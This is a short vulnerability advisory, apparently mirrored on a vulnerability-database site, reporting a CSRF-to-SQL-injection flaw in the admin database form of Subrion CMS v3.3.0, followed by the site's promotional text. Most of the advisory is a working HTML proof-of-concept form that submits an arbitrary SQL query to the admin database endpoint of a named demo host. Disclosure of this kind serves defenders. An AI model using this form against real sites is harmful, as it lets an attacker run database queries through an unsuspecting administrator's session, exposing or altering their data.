`# Affected software: subrion
# Type of vulnerability: csrf to sql injection
# URL: http://demo.subrion.org
# Discovered by: Provensec
# Website: http://www.provensec.com
#version v3.3.0
# Proof of concept
no csrf protection on database form which made subrion to vulnerable
to database injection
vuln parameter query
poc:
<html>
<body>
<form action="http://demo.subrion.org/admin/database/" method="POST">
<input type="hidden" name="query"
value="SELECT * FROM `sbr301_albums` `id` "
/>
<input type="hidden" name="table" value="sbr301_albums" />
<input type="hidden" name="field" value="id" />
<input type="hidden" name="exec_query" value="Go" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation